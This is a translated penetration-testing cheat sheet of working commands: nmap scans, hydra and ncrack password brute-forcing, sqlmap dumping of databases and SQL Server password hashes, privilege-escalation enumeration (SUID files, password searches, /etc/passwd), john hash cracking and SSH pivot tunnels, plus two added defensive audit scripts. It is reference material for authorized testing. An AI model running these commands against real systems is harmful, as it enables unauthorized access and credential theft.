[Translation] Penetration Testing Cheat Sheet
2022-10-17 17:31
Original article link
Author: H21LAB
Translator: 阳春
Translated: 2022/10/17
Translator's note: when reposting, please credit the author, the translator and the source.
Penetration Testing Cheat Sheet
Terms of use
Regular penetration testing can significantly improve a company's security posture. Before performing any security audit, the auditor must obtain the necessary authorization and permission from the owner of the target network or system.
A sword is forged in the hope that it will be put to good use, and its maker bears no responsibility for its misuse; this document was likewise written in the hope that it will be put to good use, but it comes with no guarantee of any kind.
Linux security audit commands:
-------------------------- Remote network commands --------------------------
Useful Linux network commands
traceroute
```bash
traceroute 8.8.8.8
```
nmap TCP SYN scan of all TCP ports with script scanning, writing every nmap output format
```bash
nmap -sS -sV -sC -v -p- -oA all-tcp-127.0.0.1 127.0.0.1
nmap -sS -sV -A -v -p- -oA all-tcp-127.0.0.1 127.0.0.1
```
nmap reverse DNS resolution
```bash
nmap -Pn -sn -R -oA dns-10.1.0.0_16 10.1.0.0/16
```
Update the nmap script database
```bash
nmap --script-updatedb
```
List the nmap scripts
```bash
ls -la /usr/share/nmap/scripts/
```
nmap brute-force scripts
```bash
nmap -vvv --script http-brute --script-args userdb=users.txt,passdb=pass.txt -p <port> <host>
nmap --script vmauthd-brute -p <port> <host>
nmap --script ftp-brute -p <port> <host>
```
Script help
```bash
nmap --script-help ssl-heartbleed
```
Scan with a script
```bash
nmap -sV --script=ssl-heartbleed.nse -p <port> <host>
```
Scan with a group of scripts
```bash
nmap -sV --script=smb* -p <port> <host>
```
Using nmap as a vulnerability scanner
```bash
mkdir /usr/share/nmap/scripts/vulscan
cd /usr/share/nmap/scripts/vulscan
git clone https://github.com/scipag/vulscan.git
nmap -sV --script=vulscan/vulscan.nse 127.0.0.1
```
ncrack
```bash
ncrack -vv --user root <host>:<port>
```
ncrack RDP
```bash
ncrack -vv -U username.txt -P password.txt <host>:3389
```
ncrack SSH
```bash
ncrack -vv --user root <host>:22
```
hydra
Brute-force SSH
```bash
hydra -L <user-list.txt> -P <password-list.txt> ssh://<host>
```
Brute-force an IP router over HTTP
```bash
hydra -V -l admin -P passwords.txt -t 36 -f -s 80 192.168.1.1 http-get /
hydra -V -l admin -P passwords.txt -t 36 -f -s 80 http-get://192.168.1.1:8080
```
Brute-force FTP
```bash
hydra -V -l admin -P passwords.txt -e ns -f -s 21 192.168.1.1 ftp
```
Brute-force RDP
```bash
hydra -t 1 -V -f -l username -P password.lst rdp://192.168.1.1
```
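As an added example that is not part of the original cheat sheet, here is the defender's side of the brute-force commands above: a POSIX shell snippet that counts failed SSH password attempts per source address in sshd auth-log lines and flags any source at or above a threshold, which is the footprint that ncrack or hydra runs leave in /var/log/auth.log. The log lines are constructed sample data, and the parsing assumes OpenSSH's standard "Failed password for ... from <ip> port ..." message; it reuses the "sort | uniq -c | sort -n" grouping idiom from the utility section below.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): count failed SSH logins per
# source address and report the ones that look like a brute-force attempt.

# Constructed sample auth-log lines (not real data): four failures from one
# address, one failure from another, plus an accepted login and cron noise.
SAMPLE_AUTH_LOG='Oct 17 17:31:01 host sshd[1201]: Failed password for root from 203.0.113.7 port 51234 ssh2
Oct 17 17:31:02 host sshd[1202]: Failed password for invalid user admin from 203.0.113.7 port 51235 ssh2
Oct 17 17:31:02 host sshd[1203]: Failed password for root from 203.0.113.7 port 51236 ssh2
Oct 17 17:31:03 host sshd[1204]: Accepted publickey for alice from 198.51.100.4 port 40000 ssh2
Oct 17 17:31:04 host sshd[1205]: Failed password for root from 203.0.113.7 port 51237 ssh2
Oct 17 17:31:05 host sshd[1206]: Failed password for bob from 198.51.100.9 port 40001 ssh2
Oct 17 17:31:06 host CRON[1207]: pam_unix(cron:session): session opened for user root'

# Read log lines on stdin; print "count ip" for every source that produced a
# failed password attempt, least active first (the sheet's GROUP BY idiom).
failed_logins_by_source() {
    grep 'sshd.*Failed password' |
        awk '{ for (i = 1; i <= NF; i++) if ($i == "from") print $(i + 1) }' |
        sort | uniq -c | sort -n | awk '{ print $1, $2 }'
}

# Read log lines on stdin; print only the sources whose failure count reaches
# the threshold passed as $1.
brute_force_sources() {
    threshold="$1"
    failed_logins_by_source | awk -v t="$threshold" '$1 >= t { print $2 }'
}

# Stand-alone run on the constructed sample: sources with at least 3 failures.
# On a live host the input would be: grep sshd /var/log/auth.log | brute_force_sources 10
printf '%s\n' "$SAMPLE_AUTH_LOG" | brute_force_sources 3
```

The threshold is deliberately a parameter: a handful of failures per day from one address is normal typo noise, while hundreds within minutes from a single source is the pattern the password-guessing tools above produce.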
skipfish
Basic scan
```bash
skipfish -o out_dir https://www.host.com
```
Use cookies to scan pages that require authentication
```bash
skipfish -o out_dir -I urls_to_scan -X urls_not_to_scan -C cookie1=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX -C cookie2=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX https://www.host.com
```
wfuzz
URL brute force
```bash
wfuzz -c -z file,Directories_Common.wordlist --hc 404 http://<host>/FUZZ.php
```
GET parameter brute force
```bash
wfuzz -c -z file,users.txt -z file,pass.txt --hc 404 "http://<host>/index.php?user=FUZZ&pass=FUZ2Z"
```
sqlmap
```bash
sqlmap -u "http://host.com/vulnerable.php?param=12345"
sqlmap -u "http://host.com/vulnerable.php?param=12345" --dbms "Microsoft SQL Server" --sql-query="select name,master.sys.fn_sqlvarbasetostr(password_hash) from master.sys.sql_logins"
sqlmap -u "http://host.com/vulnerable.php?param=12345" --dbms "Microsoft SQL Server" --dbs
sqlmap -u "http://host.com/vulnerable.php?param=12345" --dbms "Microsoft SQL Server" --dump -D database -T table
sqlmap -u "http://host.com/vulnerable.php?param=12345" --cookie "cookie1=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
sqlmap -r POST.txt -p field
```
MySQL
```bash
mysql -u <username> -p --port <port> -h <host>
mysqldump -h <host> -u <username> -p -f --port <port> --events --routines --triggers --all-databases > MySQLData.sql
```
Oracle
```bash
sqlplus "username/password@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=hostname)(PORT=port))(CONNECT_DATA=(SERVER=dedicated)(SERVICE_NAME=servicename)))"
```
sqlplus commands
```sql
-- Improve sqlplus command-line output
SET PAGESIZE 50000;

-- List tablespaces
SELECT TABLESPACE_NAME FROM USER_TABLESPACES;

-- List all tables
SELECT owner, table_name FROM dba_tables;

-- Find tables that have a column with a given name
SELECT owner, table_name, column_name FROM all_tab_columns WHERE UPPER(column_name) = UPPER('PASSWORD');
SELECT owner, table_name, column_name FROM all_tab_columns WHERE UPPER(column_name) LIKE '%PASS%';

-- Find tables by column name and count their rows
SET SERVEROUTPUT ON
DECLARE
  val NUMBER;
BEGIN
  FOR i IN (SELECT DISTINCT owner, table_name FROM all_tab_columns WHERE UPPER(column_name) LIKE '%PASS%') LOOP
    EXECUTE IMMEDIATE 'SELECT count(*) FROM ' || i.owner || '.' || i.table_name INTO val;
    DBMS_OUTPUT.PUT_LINE(i.owner || '.' || i.table_name || ' ==> ' || val);
  END LOOP;
END;
/

-- Search every NVARCHAR2 column in the database for a value
SET SERVEROUTPUT ON SIZE 100000
DECLARE
  match_count INTEGER;
BEGIN
  FOR t IN (SELECT owner, table_name, column_name FROM all_tab_columns WHERE owner <> 'SYS' AND data_type LIKE 'NVARCHAR2') LOOP
    EXECUTE IMMEDIATE 'SELECT COUNT(*) FROM ' || t.owner || '.' || t.table_name || ' WHERE ' || t.column_name || ' = :1'
      INTO match_count USING 'SEARCH_TEXT';
    IF match_count > 0 THEN
      dbms_output.put_line(t.table_name || ' ' || t.column_name || ' ' || match_count);
    END IF;
  END LOOP;
END;
/
```
Postgres
```bash
psql -h 127.0.0.1 db_name username
```
SNMP
SNMPv1
```bash
snmpwalk -mALL -v1 -cpublic <host>
snmpwalk -mALL -v1 -cprivate <host>
snmpget -mALL -v1 -cpublic <host> sysName.0
```
SNMPv2
```bash
snmpwalk -v2c -cprivate <host>:<port>
snmpget -v2c -cprivate -mALL <host> sysName.0 sysObjectID.0 ilomCtrlDateAndTime.0
snmpset -mALL -v2c -cprivate <host> ilomCtrlHttpEnabled.0 i 1
# expected output of the snmpset above:
SUN-ILOM-CONTROL-MIB::ilomCtrlHttpEnabled.0 = INTEGER: true(1)
```
SNMPv3
```bash
snmpwalk -v3 -l authPriv -u snmpadmin -a MD5 -A PaSSword -x DES -X PRIvPassWord <host>:<port> system
```
LDAP
```bash
ldapsearch -x -b "dc=company,dc=com" -s base -h <host>
LDAPTLS_REQCERT=never ldapsearch -x -D "uid=Name.Surname,OU=People,DC=Company,DC=com" -W -H ldaps://<host> -b "uid=Name.Surname,OU=People,DC=Company,DC=com" -s sub
ldapsearch -x -p 389 -h "127.0.0.1" -b "ou=people,dc=company,dc=com" -s sub "objectClass=*"
ldapsearch -x -p 1389 -h "127.0.0.1" -b "dc=company,dc=com" -s one "objectClass=*"
ldapmodify -a -h "127.0.0.1" -p 389 -D "cn=Directory Manager" -w 'password' -f modify.ldif
# contents of modify.ldif:
dn: ou=people,dc=company,dc=com
objectClass: top
objectClass: organizationalunit
ou: people
...
ldapdelete -x -D "cn=Directory Manager" -w 'password' -p 1389 -h "127.0.0.1" "uid=identifier,ou=people,dc=company,dc=com"
```
Redis
```bash
redis-cli dbsize
```
NFS
```bash
showmount -e 127.0.0.1
mount -o ro 127.0.0.1:/ /mnt/nfs
```
SIP
svmap, send SIP OPTIONS
```bash
svmap -p5060,5061,5080-5090 10.0.0.1
```
svcrack
```bash
svcrack -u100 -d dictionary.txt 10.0.0.1
```
SMB
```bash
smbclient -L <host> -N
smbclient //<host>/<dir> -N
```
SSHFS
redir
```bash
redir --laddr=<listen_address> --lport=<listen_port> --caddr=<connect_address> --cport=<connect_port>
```
Send an HTTP POST request
```bash
curl --data "param1=value1&param2=value2" https://host.com/index.php
```
Send a SOAP request with nc
```bash
#!/bin/sh
HOST=host.com
PORT=8888
nc $HOST $PORT << __EOF__
POST /services/ HTTP/1.1
Host: host.com:8888
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://host.com/">
   <soapenv:Header/>
   <soapenv:Body>
      <web:soapRequest>
      </web:soapRequest>
   </soapenv:Body>
</soapenv:Envelope>
__EOF__
```
Send a SOAP request with curl
```bash
$ proxychains curl --header "Content-Type: text/xml;charset=UTF-8" --header "SOAPAction:" --data @data.xml http://127.0.0.1:8888/
$ cat data.xml
<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://host.com/">
   <soapenv:Header/>
   <soapenv:Body>
      <web:soapRequest>
      </web:soapRequest>
   </soapenv:Body>
</soapenv:Envelope>
```
Send a payload with nping, spoofing the source IP
```bash
sudo nping -c 1 --data hexstring --udp -p dest_port -S source_ip -g source_port dest_ip
```
Grouping in bash, like SQL GROUP BY
```bash
cat test.txt | sort | uniq -c | sort -n
```
Wireshark over SSH
```bash
ssh root@192.168.1.1 "sudo tcpdump -U -s0 -i lo -w - 'not port 22'" | wireshark -k -i -
wireshark -k -i <(ssh root@192.168.1.1 tcpdump -U -s0 -i any -w - not port 22)
```
HEX to PCAP
```bash
xxd -r -p test.hex | od -Ax -tx1 | text2pcap - test.pcap
```
Parse JSON
```bash
grep -Po '"field" : .*?[^\\]",' test.json
```
tshark: save filtered packets to a file
```bash
tshark -r input.pcap -Y "ip.src == 10.1.1.1" -w output.pcap -F pcap
```
john the ripper on the GPU, OpenCL format, start a session
```bash
john --session=session_name --format=opencl ~/hash.txt
```
john the ripper: list the GPU OpenCL formats
```bash
john --list=formats --format=opencl
```
john the ripper: resume a session
```bash
john --restore=session_name
```
john the ripper: show cracked passwords
```bash
john ~/hash.txt --show
```
dynamic formats
Edit john/JohnTheRipper/run/dynamic.conf, then:
```bash
john --fork=16 --session=session_dynamic --format=dynamic_xxxx hash.txt
```
-------------------------- Local commands --------------------------
Useful Linux local commands
Quick system analysis that may help with privilege escalation
Before working on the remote system, enable logging of the interactive session. Run this only after the connection (ssh or similar) has been established.
```bash
script <filename>
```
Log in
```bash
ssh username@hostname
```
Check the current shell
```bash
echo $0
```
Check the current user
```bash
whoami
```
Check the system
```bash
uname -a
```
Check the system uptime
```bash
uptime
```
Check environment variables
```bash
export
```
Check processes
```bash
ps -ef
ps auxf
ps auxfww
```
Search files
```bash
find . -name "*.java" -type f -exec fgrep -iHn "textToFind" {} \;
find . -regex ".*\.\(c\|java\)" -type f -exec fgrep -iHn "textToFind" {} \;
find / -maxdepth 4 -name "*.conf" -type f -exec grep -Hn "textToFind" {} \; 2>/dev/null
```
SUID files owned by root
```bash
find / -uid 0 -perm -4000 -type f 2>/dev/null
```
World-readable SUID files owned by root
```bash
find / -uid 0 -perm -u=s,o=r -type f -exec ls -la {} \; 2>/dev/null
```
SUID files
```bash
find / -perm -4000 -type f 2>/dev/null
```
World-writable directories
```bash
find / -perm -2 -type d 2>/dev/null
```
Search files for passwords, ignoring errors and filtering out proc and other folders
```bash
find . ! -path "*/proc/*" -type f -name "*" -exec fgrep -iHn password {} \;
find . -type f \( -iname \*.conf -o -iname \*.cfg -o -iname \*.xml -o -iname \*.ini -o -iname \*.json -o -iname \*.sh -o -iname \*.pl -o -iname \*.py \) -exec fgrep -iHn password {} \; 2>/dev/null
```
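The SUID, world-writable-directory and password-in-config searches above, wrapped as functions over an arbitrary root directory, as an added example that is not from the original cheat sheet. It builds a constructed scratch tree (one SUID script, one world-writable directory, one config file holding a plaintext password) so the checks can be exercised without touching the real system; for a hardening audit, point the same functions at / and keep the sheet's 2>/dev/null.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): the local privilege-
# escalation checks from the sheet as reusable audit functions, run against a
# constructed sandbox tree instead of the live filesystem.

# Build the constructed sandbox: one SUID binary, one world-writable directory
# and one config file with a plaintext password. Returns its path on stdout.
make_sandbox() {
    umask 022
    root=$(mktemp -d)
    mkdir -p "$root/usr/bin" "$root/tmp/dropbox" "$root/etc/app"
    printf '#!/bin/sh\necho hi\n' > "$root/usr/bin/helper"
    chmod 4755 "$root/usr/bin/helper"           # setuid bit set (SUID file)
    chmod 1777 "$root/tmp/dropbox"              # world-writable (sticky, like /tmp)
    printf 'db_user=app\ndb_password=hunter2\n' > "$root/etc/app/app.conf"
    printf 'level=info\n' > "$root/etc/app/logging.ini"
    echo "$root"
}

# SUID files below $1, printed relative to $1 (sheet: find / -perm -4000 -type f).
find_suid() {
    find "$1" -perm -4000 -type f 2>/dev/null | sed "s|^$1/||" | sort
}

# World-writable directories below $1 (sheet: find / -perm -2 -type d).
find_world_writable_dirs() {
    find "$1" -perm -2 -type d 2>/dev/null | sed "s|^$1/||" | sort
}

# Config-like files below $1 that mention "password" (case-insensitive), as
# path:line:text (sheet: find . -type f \( -iname \*.conf -o ... \) -exec fgrep -iHn).
find_password_mentions() {
    find "$1" -type f \( -iname \*.conf -o -iname \*.cfg -o -iname \*.ini \
        -o -iname \*.xml -o -iname \*.json \) -exec grep -iHn password {} \; 2>/dev/null |
        sed "s|^$1/||" | sort
}

# Stand-alone run against the constructed tree, then clean up.
SANDBOX=$(make_sandbox)
echo "SUID files:";           find_suid "$SANDBOX"
echo "World-writable dirs:";  find_world_writable_dirs "$SANDBOX"
echo "Password mentions:";    find_password_mentions "$SANDBOX"
rm -rf "$SANDBOX"
```

Each finding maps to a concrete fix: an unexpected SUID binary is stripped with chmod u-s or removed, a world-writable directory that is not a sticky scratch area gets chmod o-w, and a plaintext password in a config file is moved into a secrets store or at least a root-only 0600 file.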
Search using a list of patterns read from a file (one pattern per line)
```bash
# -f reads the patterns from patterns.txt; -F treats them as fixed strings
find . -type f -exec grep -iHFf patterns.txt {} \;
```
Search for passwords in small files
```bash
find . -type f -size -512k -exec fgrep -iHn password {} \;
```
Decompile Java jar files and search them for passwords
```bash
find . -name "*.jar" -type f -exec ~/jd-cli/jd-cli -oc -l -n -st {} \; | egrep -i -e "Location:" -e "password" | uniq
```
Check open ports and listening services
```bash
netstat -anp
```
Check custom hosts entries
```bash
cat /etc/hosts
```
Check local IP addresses and network interfaces
```bash
ifconfig -a
```
Check routes
```bash
route -v
```
Check file systems
```bash
df
```
Check sudo privileges
```bash
sudo -l
```
Check scheduled jobs
```bash
crontab -l
```
Check startup tasks
```bash
cat /etc/inittab
```
Try sniffing traffic
```bash
tcpdump
tcpdump -s0 not port 22 -w trace.pcap
```
Check known server host keys
```bash
cat ~/.ssh/known_hosts
```
Try reading mail
```bash
head /var/mail/root
```
List groups and users
```bash
cat /etc/group
cat /etc/passwd
```
Check shared memory
```bash
ipcs -mp
```
Log out
```bash
logout
```
Close the script session
```text
Ctrl + D
```
-------------------------- SSH tunnels and chains --------------------------
Helpful for hopping between machines and tunnelling
SSH ProxyCommand
```text
# ssh config (~/.ssh/config)
Host _first_server
    Hostname XXX.XXX.XXX.XX
    Port 22
    User root

Host _second_server
    Hostname 127.0.0.1
    Port 22
    User root
    # password is "XXXXXXX"
    ProxyCommand ssh -v -W 127.0.0.1:22 _first_server

Host _third_server
    Hostname XXX.XXX.XXX.XXX
    Port 22
    User XXXXX
    ProxyCommand ssh _second_server -W %h:%p

Host _host_over_sshpass and ssh key
    Hostname XXX.XXX.XXX.XXX
    IdentityFile id_rsa
    User XXXXX
    ProxyCommand sshpass -pXXXXXXX ssh -Fssh_config _host_previous_in_chain -W %h:%p
```
Proxy chains
Run ssh in the background without executing a remote command
```bash
ssh -f -N -D 9050 user@host
proxychains telnet hosts
```
Reach a web server on the remote side through a local SSH tunnel
```bash
sudo ssh -F ~/.ssh/ssh_config _host_definition -L 127.0.0.1:8080:127.0.0.1:8080 -L 127.0.0.1:8443:127.0.0.1:8443
```
torsocks
```bash
torsocks sshpass -p '********' ssh -C admin@XXX.XXX.XXX.XXX "sudo tcpdump -i any -U -s0 -w - 'not port 22'" | wireshark -k -i -
```
Make a local server reachable from the internet through a remote server (reverse SSH tunnel, NAT traversal)
```bash
sudo apt install tinyproxy
sudo systemctl disable tinyproxy
sudo systemctl stop tinyproxy
sudo vi /etc/tinyproxy/tinyproxy.conf
```
Configure the listening port (for example port 3128)
```bash
sudo systemctl start tinyproxy
```
```bash
# remote port 3128 now forwards to the local tinyproxy
ssh -R 3128:127.0.0.1:3128 host
# on the remote host, point clients at the forwarded port
export http_proxy=http://127.0.0.1:3128
export https_proxy=http://127.0.0.1:3128
```
-------------------------- Decompilers --------------------------
jd-gui (Java decompiler)
```bash
cd ~/Decompilers/Java/
java -jar jd-gui-1.6.2.jar
```
ghidra (C decompiler)
```bash
~/Decompilers/ghidra_9.0.4/ghidraRun
```
ffdec (Flash decompiler)
```text
sudo update-alternatives --config java
There are 2 choices for the alternative java (providing /usr/bin/java).

  Selection    Path                                            Priority   Status
------------------------------------------------------------
  0            /usr/lib/jvm/java-11-openjdk-amd64/bin/java     1111      auto mode
* 1            /usr/lib/jvm/java-10-openjdk-amd64/bin/java     1         manual mode
  2            /usr/lib/jvm/java-11-openjdk-amd64/bin/java     1111      manual mode

Press <enter> to keep the current choice[*], or type selection number:
cd ~/Decompilers/Flash/ffdec_11.2.0_nightly1721
./ffdec.sh
```
-------------------------- Utilities --------------------------
Compress and copy files over ssh with rsync
```bash
rsync --append-verify -avhzpP -e ssh user@host:/source/* dest
```
rsync local copy, full sync, deleting files removed from the source
```bash
rsync --append-verify -avhpP --delete /source/* dest
```
grep in a CSV file
```bash
cat some.csv | awk -F, '$3 == value {print}'
```
Search for files modified within a date range
```bash
find . -type f -newermt "YYYY-MM-D1" ! -newermt "YYYY-MM-D2"
```